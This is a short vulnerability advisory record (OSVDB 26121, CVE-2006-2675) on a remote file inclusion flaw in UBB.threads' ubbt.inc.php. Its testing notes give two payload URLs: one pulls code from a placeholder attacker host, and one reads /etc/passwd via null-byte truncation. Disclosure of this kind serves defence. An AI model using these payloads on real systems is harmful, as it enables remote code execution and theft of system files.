UBB.threads ubbt.inc.php GLOBALS[thispath] Variable Remote File Inclusion

ID OSVDB:26121
Type osvdb
Reporter Mustafa Can Bjorn(nukedx@nukedx.com)
Modified 2006-05-27T03:19:34


Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://[attacker]/cmd.txt? http://[target]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00


Vendor URL: http://www.infopop.com/ Secunia Advisory ID:20353 Related OSVDB ID: 26122 Related OSVDB ID: 26120 Other Advisory URL: http://www.nukedx.com/?viewdoc=40 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0644.html CVE-2006-2675